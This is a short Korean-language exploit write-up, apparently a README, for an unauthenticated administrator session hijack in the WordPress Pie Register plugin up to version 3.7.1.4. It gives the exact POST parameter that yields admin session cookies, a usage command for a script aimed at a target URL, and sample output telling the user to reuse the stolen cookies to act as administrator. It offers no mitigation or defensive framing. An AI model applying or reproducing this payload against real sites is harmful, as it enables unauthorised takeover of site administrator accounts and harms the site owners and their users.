
WordPress Pie Register ≤ 3.7.1.4 - 관리자 권한 상승 (인증되지 않음)
Mrj Haxcore
WordPress용 Pie Register 플러그인(버전 ≤ 3.7.1.4)은 인증되지 않은 엔드포인트를 노출하여 공격자가 특정 페이로드를 POST하는 것만으로 관리자 세션을 가로챌 수 있습니다.
익스플로잇 결과, 로그인 자격 증명 없이 사용자 ID 1(보통 admin)의 세션 쿠키를 탈취할 수 있습니다.
pie-registeruser_id_social_site=1
루트 URL(/)에 POST되면, 이 매개변수는 플러그인이 공격자를 ID 1(일반적으로 admin)인 사용자로 인증하고 유효한 세션 쿠키를 발급하도록 합니다.
requests, beautifulsoup4 (선택 사항, 쿠키 파싱용)python3 pie.py http://target.site
---
출력
[*] 관리자 세션을 가로채기 위해 페이로드 전송 중...
[+] user_id=1(admin)에 대한 쿠키 가로채기 성공:
wordpress_sec_xxxxxx = <cookie_value>
wordpress_logged_in_xxxxxx = <cookie_value>
[!] 이 쿠키를 브라우저나 curl, Burp 같은 도구에서 사용하여 관리자로 행동하세요.